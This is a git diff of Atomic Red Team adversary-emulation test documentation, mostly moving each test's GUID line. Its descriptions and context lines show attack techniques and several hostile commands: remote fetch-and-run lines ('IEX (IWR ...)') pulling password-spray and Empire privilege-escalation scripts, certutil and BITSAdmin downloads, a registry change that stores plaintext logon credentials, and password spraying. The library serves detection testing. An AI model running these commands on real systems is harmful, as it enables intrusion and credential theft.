## Atomic Test #6 - sftp remote file copy (pull) - -auto_generated_guid: 0139dba1-f391-405e-a4f5-f3989f2c88ef - Utilize sftp to perform a remote file copy (pull) + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 0139dba1-f391-405e-a4f5-f3989f2c88ef + + + #### Inputs: @@ -240,13 +252,15 @@ sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
## Atomic Test #7 - certutil download (urlcache) - -auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0 - Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works! + **Supported Platforms:** Windows +**auto_generated_guid:** dd3b61dd-7bbc-48cd-ab51-49ad1a776df0 + + + #### Inputs: @@ -276,13 +290,15 @@ del #{local_path} >nul 2>&1
## Atomic Test #8 - certutil download (verifyctl) - -auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b - Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works! + **Supported Platforms:** Windows +**auto_generated_guid:** ffd492e3-0455-4518-9fb1-46527c9f241b + + + #### Inputs: @@ -316,14 +332,16 @@ Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force -Recurse -ErrorActi
## Atomic Test #9 - Windows - BITSAdmin BITS Download - -auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b - This test uses BITSAdmin.exe to schedule a BITS job for the download of a file. This technique is used by Qbot malware to download payloads. + **Supported Platforms:** Windows +**auto_generated_guid:** a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b + + + #### Inputs: @@ -350,14 +368,16 @@ C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{re
## Atomic Test #10 - Windows - PowerShell Download - -auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8 - This test uses PowerShell to download a payload. This technique is used by multiple adversaries and malware families. + **Supported Platforms:** Windows +**auto_generated_guid:** 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8 + + + #### Inputs: @@ -387,13 +407,15 @@ Remove-Item #{destination_path} -Force -ErrorAction Ignore
## Atomic Test #11 - OSTAP Worming Activity - -auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad - OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity. + **Supported Platforms:** Windows +**auto_generated_guid:** 2ca61766-b456-4fcf-a35a-1233685e1cad + + + #### Inputs: @@ -423,14 +445,16 @@ popd
## Atomic Test #12 - svchost writing a file to a UNC path - -auto_generated_guid: fa5a2759-41d7-4e13-a19c-e8f28a53566f - svchost.exe writing a non-Microsoft Office file to a file with a UNC path. Upon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\`, then execute svchost.exe with output to a txt file. + **Supported Platforms:** Windows +**auto_generated_guid:** fa5a2759-41d7-4e13-a19c-e8f28a53566f + + + @@ -456,17 +480,19 @@ del C:\\svchost.exe >nul 2>&1
## Atomic Test #13 - Download a File with Windows Defender MpCmdRun.exe - -auto_generated_guid: 815bef8b-bf91-4b67-be4c-abe4c2a94ccc - Uses the Windows Defender to download a file from the internet (must have version 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9 installed). The input arguments "remote_file" and "local_path" can be used to specify the download URL and the name of the output file. By default, the test downloads the Atomic Red Team license file to the temp directory. More info and how to find your version can be found here https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/ + **Supported Platforms:** Windows +**auto_generated_guid:** 815bef8b-bf91-4b67-be4c-abe4c2a94ccc + + + #### Inputs: @@ -514,13 +540,15 @@ Write-Host "Windows Defender verion 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9 m
## Atomic Test #14 - whois file download - -auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab - Download a remote file using the whois utility + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** c99a829f-0bb8-4187-b2c6-d47d1df74cab + + + #### Inputs: diff --git a/atomics/T1106/T1106.md b/atomics/T1106/T1106.md index 4f7c9b48..0e25b7fe 100644 --- a/atomics/T1106/T1106.md +++ b/atomics/T1106/T1106.md @@ -16,13 +16,15 @@ Adversaries may abuse these native API functions as a means of executing behavio
## Atomic Test #1 - Execution through API - CreateProcess - -auto_generated_guid: 99be2089-c52d-4a4a-b5c3-261ee42c8b62 - Execute program by leveraging Win32 API's. By default, this will launch calc.exe from the command prompt. + **Supported Platforms:** Windows +**auto_generated_guid:** 99be2089-c52d-4a4a-b5c3-261ee42c8b62 + + + #### Inputs: diff --git a/atomics/T1110.001/T1110.001.md b/atomics/T1110.001/T1110.001.md index c62f01f1..03513e36 100644 --- a/atomics/T1110.001/T1110.001.md +++ b/atomics/T1110.001/T1110.001.md @@ -33,13 +33,15 @@ In default environments, LDAP and Kerberos connection attempts are less likely t
## Atomic Test #1 - Brute Force Credentials of all domain users via SMB - -auto_generated_guid: 09480053-2f98-4854-be6e-71ae5f672224 - Creates username and password files then attempts to brute force on remote host + **Supported Platforms:** Windows +**auto_generated_guid:** 09480053-2f98-4854-be6e-71ae5f672224 + + + #### Inputs: @@ -71,13 +73,15 @@ echo "Password!" >> #{input_file_passwords}
## Atomic Test #2 - Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos) - -auto_generated_guid: c2969434-672b-4ec8-8df0-bbb91f40e250 - Attempt to brute force domain user on a domain controller, via LDAP, with NTLM or Kerberos + **Supported Platforms:** Windows +**auto_generated_guid:** c2969434-672b-4ec8-8df0-bbb91f40e250 + + + #### Inputs: diff --git a/atomics/T1110.002/T1110.002.md b/atomics/T1110.002/T1110.002.md index 7157b87b..67d78ecd 100644 --- a/atomics/T1110.002/T1110.002.md +++ b/atomics/T1110.002/T1110.002.md @@ -10,13 +10,15 @@
## Atomic Test #1 - Password Cracking with Hashcat - -auto_generated_guid: 6d27df5d-69d4-4c91-bc33-5983ffe91692 - Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against + **Supported Platforms:** Windows +**auto_generated_guid:** 6d27df5d-69d4-4c91-bc33-5983ffe91692 + + + #### Inputs: diff --git a/atomics/T1110.003/T1110.003.md b/atomics/T1110.003/T1110.003.md index b5cb5bd3..b8450e15 100644 --- a/atomics/T1110.003/T1110.003.md +++ b/atomics/T1110.003/T1110.003.md @@ -33,16 +33,18 @@ In default environments, LDAP and Kerberos connection attempts are less likely t
## Atomic Test #1 - Password Spray all Domain Users - -auto_generated_guid: 90bc2e54-6c84-47a5-9439-0a2a92b4b175 - CAUTION! Be very careful to not exceed the password lockout threshold for users in the domain by running this test too frequently. This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list. Any successful authentications will be printed to the screen with a message like "[*] username:password", whereas a failed auth will simply print a period. Use the input arguments to specify your own password to use for the password spray. Use the get_prereq_command's to create a list of all domain users in the temp directory called users.txt. See the "Windows FOR Loop Password Spraying Made Easy" blog by @OrOneEqualsOne for more details on how these spray commands work. https://medium.com/walmartlabs/windows-for-loop-password-spraying-made-easy-c8cd4ebb86b5 + **Supported Platforms:** Windows +**auto_generated_guid:** 90bc2e54-6c84-47a5-9439-0a2a92b4b175 + + + #### Inputs: @@ -79,15 +81,17 @@ PathToAtomicsFolder\T1110.003\src\parse_net_users.bat
## Atomic Test #2 - Password Spray (DomainPasswordSpray) - -auto_generated_guid: 263ae743-515f-4786-ac7d-41ef3a0d4b2b - Perform a domain password spray using the DomainPasswordSpray tool. It will try a single password against all users in the domain https://github.com/dafthack/DomainPasswordSpray + **Supported Platforms:** Windows +**auto_generated_guid:** 263ae743-515f-4786-ac7d-41ef3a0d4b2b + + + #### Inputs: @@ -113,15 +117,17 @@ IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb725
## Atomic Test #3 - Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos) - -auto_generated_guid: f14d956a-5b6e-4a93-847f-0c415142f07d - Attempt to brute force all domain user with a single password (called "password spraying") on a domain controller, via LDAP, with NTLM or Kerberos Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user (to fetch the list of all domain users) + **Supported Platforms:** Windows +**auto_generated_guid:** f14d956a-5b6e-4a93-847f-0c415142f07d + + + #### Inputs: diff --git a/atomics/T1110.004/T1110.004.md b/atomics/T1110.004/T1110.004.md index 8f7114b7..fb33c74f 100644 --- a/atomics/T1110.004/T1110.004.md +++ b/atomics/T1110.004/T1110.004.md @@ -31,13 +31,15 @@ In addition to management services, adversaries may "target single sign-on (SSO)
## Atomic Test #1 - SSH Credential Stuffing From Linux - -auto_generated_guid: 4f08197a-2a8a-472d-9589-cd2895ef22ad - Using username,password combination from a password dump to login over SSH. + **Supported Platforms:** Linux +**auto_generated_guid:** 4f08197a-2a8a-472d-9589-cd2895ef22ad + + + #### Inputs: @@ -75,13 +77,15 @@ if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | g
## Atomic Test #2 - SSH Credential Stuffing From MacOS - -auto_generated_guid: d546a3d9-0be5-40c7-ad82-5a7d79e1b66b - Using username,password combination from a password dump to login over SSH. + **Supported Platforms:** macOS +**auto_generated_guid:** d546a3d9-0be5-40c7-ad82-5a7d79e1b66b + + + #### Inputs: diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md index 119a4d22..1214c378 100644 --- a/atomics/T1112/T1112.md +++ b/atomics/T1112/T1112.md @@ -26,14 +26,16 @@ The Registry of a remote system may be modified to aid in execution of files as
## Atomic Test #1 - Modify Registry of Current User Profile - cmd - -auto_generated_guid: 1324796b-d0f6-455a-b4ae-21ffee6aa6b9 - Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The operation completed successfully." will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced. + **Supported Platforms:** Windows +**auto_generated_guid:** 1324796b-d0f6-455a-b4ae-21ffee6aa6b9 + + + @@ -57,15 +59,17 @@ reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
## Atomic Test #2 - Modify Registry of Local Machine - cmd - -auto_generated_guid: 282f929a-6bc5-42b8-bd93-960c3ba35afe - Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully." will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run. + **Supported Platforms:** Windows +**auto_generated_guid:** 282f929a-6bc5-42b8-bd93-960c3ba35afe + + + #### Inputs: @@ -94,15 +98,17 @@ reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v S
## Atomic Test #3 - Modify registry to store logon credentials - -auto_generated_guid: c0413fb5-33e2-40b7-9b6f-60b29f4a7a18 - Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping). Upon execution, the message "The operation completed successfully." will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest. + **Supported Platforms:** Windows +**auto_generated_guid:** c0413fb5-33e2-40b7-9b6f-60b29f4a7a18 + + + @@ -126,17 +132,19 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
## Atomic Test #4 - Add domain to Trusted sites Zone - -auto_generated_guid: cf447677-5a4e-4937-a82c-e47d254afd57 - Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365. Upon execution, details of the new registry entries will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\. https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf + **Supported Platforms:** Windows +**auto_generated_guid:** cf447677-5a4e-4937-a82c-e47d254afd57 + + + #### Inputs: @@ -171,14 +179,16 @@ Remove-item $key -Recurse -ErrorAction Ignore
## Atomic Test #5 - Javascript in registry - -auto_generated_guid: 15f44ea9-4571-4837-be9e-802431a7bfae - Upon execution, a javascript block will be placed in the registry for persistence. Additionally, open Registry Editor to view the modified entry in HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings. + **Supported Platforms:** Windows +**auto_generated_guid:** 15f44ea9-4571-4837-be9e-802431a7bfae + + + @@ -202,14 +212,16 @@ Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Se
## Atomic Test #6 - Change Powershell Execution Policy to Bypass - -auto_generated_guid: f3a6cceb-06c9-48e5-8df8-8867a6814245 - Attackers need to change the powershell execution policy in order to run their malicious powershell scripts. They can either specify it during the execution of the powershell script or change the registry value for it. + **Supported Platforms:** Windows +**auto_generated_guid:** f3a6cceb-06c9-48e5-8df8-8867a6814245 + + + #### Inputs: diff --git a/atomics/T1113/T1113.md b/atomics/T1113/T1113.md index a2cd69a4..fc466d2d 100644 --- a/atomics/T1113/T1113.md +++ b/atomics/T1113/T1113.md @@ -19,13 +19,15 @@
## Atomic Test #1 - Screencapture - -auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac - Use screencapture command to collect a full desktop screenshot + **Supported Platforms:** macOS +**auto_generated_guid:** 0f47ceb1-720f-4275-96b8-21f0562217ac + + + #### Inputs: @@ -54,13 +56,15 @@ rm #{output_file}
## Atomic Test #2 - Screencapture (silent) - -auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 - Use screencapture command to collect a full desktop screenshot + **Supported Platforms:** macOS +**auto_generated_guid:** deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 + + + #### Inputs: @@ -89,13 +93,15 @@ rm #{output_file}
## Atomic Test #3 - X Windows Capture - -auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac - Use xwd command to collect a full desktop screenshot and review file with xwud + **Supported Platforms:** Linux +**auto_generated_guid:** 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac + + + #### Inputs: @@ -139,13 +145,15 @@ sudo #{package_installer}
## Atomic Test #4 - Capture Linux Desktop using Import Tool - -auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1 - Use import command from ImageMagick to collect a full desktop screenshot + **Supported Platforms:** Linux +**auto_generated_guid:** 9cd1cccb-91e4-4550-9139-e20a586fcea1 + + + #### Inputs: @@ -186,13 +194,15 @@ sudo apt-get -y install graphicsmagick-imagemagick-compat
## Atomic Test #5 - Windows Screencapture - -auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153 - Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour + **Supported Platforms:** Windows +**auto_generated_guid:** 3c898f62-626c-47d5-aad2-6de873d69153 + + + #### Inputs: diff --git a/atomics/T1114.001/T1114.001.md b/atomics/T1114.001/T1114.001.md index 55f5e0c4..e641d3bc 100644 --- a/atomics/T1114.001/T1114.001.md +++ b/atomics/T1114.001/T1114.001.md @@ -12,16 +12,18 @@ Outlook stores data locally in offline data files with an extension of .ost. Out
## Atomic Test #1 - Email Collection with PowerShell Get-Inbox - -auto_generated_guid: 3f1b5096-0139-4736-9b78-19bcb02bb1cb - Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration. Successful execution will produce stdout message stating "Please be patient, this may take some time...". Upon completion, final output will be a mail.csv file. Note: Outlook is required, but no email account necessary to produce artifacts. + **Supported Platforms:** Windows +**auto_generated_guid:** 3f1b5096-0139-4736-9b78-19bcb02bb1cb + + + #### Inputs: diff --git a/atomics/T1115/T1115.md b/atomics/T1115/T1115.md index 4967809c..447bfa64 100644 --- a/atomics/T1115/T1115.md +++ b/atomics/T1115/T1115.md @@ -18,13 +18,15 @@ In Windows, Applications can access clipboard data by using the Windows API.(Cit
## Atomic Test #1 - Utilize Clipboard to store or execute commands from - -auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7 - Add data to clipboard to copy off or execute commands from. + **Supported Platforms:** Windows +**auto_generated_guid:** 0cd14633-58d4-4422-9ede-daa2c9474ae7 + + + @@ -50,13 +52,15 @@ del %temp%\T1115.txt >nul 2>&1
## Atomic Test #2 - Execute Commands from Clipboard using PowerShell - -auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416 - Utilize PowerShell to echo a command to clipboard and execute it + **Supported Platforms:** Windows +**auto_generated_guid:** d6dc21af-bec9-4152-be86-326b6babd416 + + + @@ -77,13 +81,15 @@ Get-Clipboard | iex
## Atomic Test #3 - Execute commands from clipboard - -auto_generated_guid: 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff - Echo a command to clipboard and execute it + **Supported Platforms:** macOS +**auto_generated_guid:** 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff + + + @@ -104,13 +110,15 @@ $(pbpaste)
## Atomic Test #4 - Collect Clipboard Data via VBA - -auto_generated_guid: 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52 - This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt + **Supported Platforms:** Windows +**auto_generated_guid:** 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52 + + + #### Inputs: diff --git a/atomics/T1119/T1119.md b/atomics/T1119/T1119.md index 90f0a4d8..f85f5632 100644 --- a/atomics/T1119/T1119.md +++ b/atomics/T1119/T1119.md @@ -18,14 +18,16 @@ This technique may incorporate use of other techniques such as [File and Directo
## Atomic Test #1 - Automated Collection Command Prompt - -auto_generated_guid: cb379146-53f1-43e0-b884-7ce2c635ff5b - Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_command_prompt_collection to see what was collected. + **Supported Platforms:** Windows +**auto_generated_guid:** cb379146-53f1-43e0-b884-7ce2c635ff5b + + + @@ -51,14 +53,16 @@ del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1
## Atomic Test #2 - Automated Collection PowerShell - -auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313 - Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_powershell_collection to see what was collected. + **Supported Platforms:** Windows +**auto_generated_guid:** 634bd9b9-dc83-4229-b19f-7f83ba9ad313 + + + @@ -83,14 +87,16 @@ Remove-Item $env:TEMP\T1119_powershell_collection -Force -ErrorAction Ignore | O
## Atomic Test #3 - Recon information for export with PowerShell - -auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26 - collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt to see what was collected. + **Supported Platforms:** Windows +**auto_generated_guid:** c3f6d794-50dd-482f-b640-0384fbb7db26 + + + @@ -118,14 +124,16 @@ Remove-Item $env:TEMP\T1119_3.txt -ErrorAction Ignore
## Atomic Test #4 - Recon information for export with Command Prompt - -auto_generated_guid: aa1180e2-f329-4e1e-8625-2472ec0bfaf3 - collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt to see what was collected. + **Supported Platforms:** Windows +**auto_generated_guid:** aa1180e2-f329-4e1e-8625-2472ec0bfaf3 + + + diff --git a/atomics/T1120/T1120.md b/atomics/T1120/T1120.md index a1d5580a..18669e5e 100644 --- a/atomics/T1120/T1120.md +++ b/atomics/T1120/T1120.md @@ -10,13 +10,15 @@
## Atomic Test #1 - Win32_PnPEntity Hardware Inventory - -auto_generated_guid: 2cb4dbf2-2dca-4597-8678-4d39d207a3a5 - Perform peripheral device discovery using Get-WMIObject Win32_PnPEntity + **Supported Platforms:** Windows +**auto_generated_guid:** 2cb4dbf2-2dca-4597-8678-4d39d207a3a5 + + + diff --git a/atomics/T1123/T1123.md b/atomics/T1123/T1123.md index ea593f6a..4c71401f 100644 --- a/atomics/T1123/T1123.md +++ b/atomics/T1123/T1123.md @@ -12,13 +12,15 @@ Malware or scripts may be used to interact with the devices through an available
## Atomic Test #1 - using device audio capture commandlet - -auto_generated_guid: 9c3ad250-b185-4444-b5a9-d69218a10c95 - [AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet) + **Supported Platforms:** Windows +**auto_generated_guid:** 9c3ad250-b185-4444-b5a9-d69218a10c95 + + + diff --git a/atomics/T1124/T1124.md b/atomics/T1124/T1124.md index 13cc9567..6c47ab1a 100644 --- a/atomics/T1124/T1124.md +++ b/atomics/T1124/T1124.md @@ -16,13 +16,15 @@ This information could be useful for performing other techniques, such as execut
## Atomic Test #1 - System Time Discovery - -auto_generated_guid: 20aba24b-e61f-4b26-b4ce-4784f763ca20 - Identify the system time. Upon execution, the local computer system time and timezone will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 20aba24b-e61f-4b26-b4ce-4784f763ca20 + + + #### Inputs: @@ -48,13 +50,15 @@ w32tm /tz
## Atomic Test #2 - System Time Discovery - PowerShell - -auto_generated_guid: 1d5711d6-655c-4a47-ae9c-6503c74fa877 - Identify the system time via PowerShell. Upon execution, the system time will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 1d5711d6-655c-4a47-ae9c-6503c74fa877 + + + diff --git a/atomics/T1127.001/T1127.001.md b/atomics/T1127.001/T1127.001.md index 750799b6..5175ec9f 100644 --- a/atomics/T1127.001/T1127.001.md +++ b/atomics/T1127.001/T1127.001.md @@ -14,13 +14,15 @@ Adversaries can abuse MSBuild to proxy execution of malicious code. The inline t
## Atomic Test #1 - MSBuild Bypass Using Inline Tasks (C#) - -auto_generated_guid: 58742c0f-cb01-44cd-a60b-fb26e8871c93 - Executes the code in a project file using msbuild.exe. The default C# project example file (T1127.001.csproj) will simply print "Hello From a Code Fragment" and "Hello From a Class." to the screen. + **Supported Platforms:** Windows +**auto_generated_guid:** 58742c0f-cb01-44cd-a60b-fb26e8871c93 + + + #### Inputs: @@ -60,13 +62,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - MSBuild Bypass Using Inline Tasks (VB) - -auto_generated_guid: ab042179-c0c5-402f-9bc8-42741f5ce359 - Executes the code in a project file using msbuild.exe. The default Visual Basic example file (vb.xml) will simply print "Hello from a Visual Basic inline task!" to the screen. + **Supported Platforms:** Windows +**auto_generated_guid:** ab042179-c0c5-402f-9bc8-42741f5ce359 + + + #### Inputs: diff --git a/atomics/T1132.001/T1132.001.md b/atomics/T1132.001/T1132.001.md index d0c7e284..f3c396c8 100644 --- a/atomics/T1132.001/T1132.001.md +++ b/atomics/T1132.001/T1132.001.md @@ -10,13 +10,15 @@
## Atomic Test #1 - Base64 Encoded data. - -auto_generated_guid: 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 - Utilizing a common technique for posting base64 encoded data. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 + + + #### Inputs: diff --git a/atomics/T1133/T1133.md b/atomics/T1133/T1133.md index 8129da91..24b4ad2b 100644 --- a/atomics/T1133/T1133.md +++ b/atomics/T1133/T1133.md @@ -14,13 +14,15 @@ Access may also be gained through an exposed service that doesn’t require auth
## Atomic Test #1 - Running Chrome VPN Extensions via the Registry 2 vpn extension - -auto_generated_guid: 4c8db261-a58b-42a6-a866-0a294deedde4 - Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list + **Supported Platforms:** Windows +**auto_generated_guid:** 4c8db261-a58b-42a6-a866-0a294deedde4 + + + #### Inputs: diff --git a/atomics/T1134.001/T1134.001.md b/atomics/T1134.001/T1134.001.md index 1a8ba916..958ceb8c 100644 --- a/atomics/T1134.001/T1134.001.md +++ b/atomics/T1134.001/T1134.001.md @@ -14,16 +14,18 @@ An adversary may do this when they have a specific, existing process they want t
## Atomic Test #1 - Named pipe client impersonation - -auto_generated_guid: 90db9e27-8e7c-4c04-b602-a45927884966 - Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script creates a named pipe, and a service that writes to that named pipe. When the service connects to the named pipe, the script impersonates its security context. When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM). Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ + **Supported Platforms:** Windows +**auto_generated_guid:** 90db9e27-8e7c-4c04-b602-a45927884966 + + + @@ -44,14 +46,16 @@ IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f
## Atomic Test #2 - `SeDebugPrivilege` token duplication - -auto_generated_guid: 34f0a430-9d04-4d98-bcb5-1989f14719f0 - Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script uses `SeDebugPrivilege` to obtain, duplicate and impersonate the token of a another process. When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM). + **Supported Platforms:** Windows +**auto_generated_guid:** 34f0a430-9d04-4d98-bcb5-1989f14719f0 + + + diff --git a/atomics/T1134.004/T1134.004.md b/atomics/T1134.004/T1134.004.md index 93157b9e..c2fa3995 100644 --- a/atomics/T1134.004/T1134.004.md +++ b/atomics/T1134.004/T1134.004.md @@ -22,17 +22,19 @@ Explicitly assigning the PPID may also enable elevated privileges given appropri
## Atomic Test #1 - Parent PID Spoofing using PowerShell - -auto_generated_guid: 069258f4-2162-46e9-9a25-c9c6c56150d2 - This test uses PowerShell to replicates how Cobalt Strike does ppid spoofing and masquerade a spawned process. Upon execution, "Process C:\Program Files\Internet Explorer\iexplore.exe is spawned with pid ####" will be displayed and calc.exe will be launched. Credit to In Ming Loh (https://github.com/countercept/ppid-spoofing/blob/master/PPID-Spoof.ps1) + **Supported Platforms:** Windows +**auto_generated_guid:** 069258f4-2162-46e9-9a25-c9c6c56150d2 + + + #### Inputs: @@ -81,13 +83,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Parent PID Spoofing - Spawn from Current Process - -auto_generated_guid: 14920ebd-1d61-491a-85e0-fe98efe37f25 - Spawns a powershell.exe process as a child of the current process. + **Supported Platforms:** Windows +**auto_generated_guid:** 14920ebd-1d61-491a-85e0-fe98efe37f25 + + + #### Inputs: @@ -128,13 +132,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #3 - Parent PID Spoofing - Spawn from Specified Process - -auto_generated_guid: cbbff285-9051-444a-9d17-c07cd2d230eb - Spawns a notepad.exe process as a child of the current process. + **Supported Platforms:** Windows +**auto_generated_guid:** cbbff285-9051-444a-9d17-c07cd2d230eb + + + #### Inputs: @@ -174,13 +180,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #4 - Parent PID Spoofing - Spawn from svchost.exe - -auto_generated_guid: e9f2b777-3123-430b-805d-5cedc66ab591 - Spawnd a process as a child of the first accessible svchost.exe process. + **Supported Platforms:** Windows +**auto_generated_guid:** e9f2b777-3123-430b-805d-5cedc66ab591 + + + #### Inputs: @@ -220,13 +228,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #5 - Parent PID Spoofing - Spawn from New Process - -auto_generated_guid: 2988133e-561c-4e42-a15f-6281e6a9b2db - Creates a notepad.exe process and then spawns a powershell.exe process as a child of it. + **Supported Platforms:** Windows +**auto_generated_guid:** 2988133e-561c-4e42-a15f-6281e6a9b2db + + + #### Inputs: diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md index 1bd8f520..a45e078c 100644 --- a/atomics/T1135/T1135.md +++ b/atomics/T1135/T1135.md @@ -22,13 +22,15 @@ File sharing over a Windows network occurs over the SMB protocol. (Citation: Wik
## Atomic Test #1 - Network Share Discovery - -auto_generated_guid: f94b5ad9-911c-4eff-9718-fd21899db4f7 - Network Share Discovery + **Supported Platforms:** macOS +**auto_generated_guid:** f94b5ad9-911c-4eff-9718-fd21899db4f7 + + + #### Inputs: @@ -55,13 +57,15 @@ showmount #{computer_name}
## Atomic Test #2 - Network Share Discovery - linux - -auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae - Network Share Discovery using smbstatus + **Supported Platforms:** Linux +**auto_generated_guid:** 875805bc-9e86-4e87-be86-3a5527315cae + + + #### Inputs: @@ -99,14 +103,16 @@ sudo #{package_installer}
## Atomic Test #3 - Network Share Discovery command prompt - -auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb - Network Share Discovery utilizing the command prompt. The computer name variable may need to be modified to point to a different host Upon execution avalaible network shares will be displayed in the powershell session + **Supported Platforms:** Windows +**auto_generated_guid:** 20f1097d-81c1-405c-8380-32174d493bbb + + + #### Inputs: @@ -131,14 +137,16 @@ net view \\#{computer_name}
## Atomic Test #4 - Network Share Discovery PowerShell - -auto_generated_guid: 1b0814d1-bb24-402d-9615-1b20c50733fb - Network Share Discovery utilizing PowerShell. The computer name variable may need to be modified to point to a different host Upon execution, avalaible network shares will be displayed in the powershell session + **Supported Platforms:** Windows +**auto_generated_guid:** 1b0814d1-bb24-402d-9615-1b20c50733fb + + + @@ -158,13 +166,15 @@ get-smbshare
## Atomic Test #5 - View available share drives - -auto_generated_guid: ab39a04f-0c93-4540-9ff2-83f862c385ae - View information about all of the resources that are shared on the local computer Upon execution, avalaible share drives will be displayed in the powershell session + **Supported Platforms:** Windows +**auto_generated_guid:** ab39a04f-0c93-4540-9ff2-83f862c385ae + + + @@ -184,13 +194,15 @@ net share
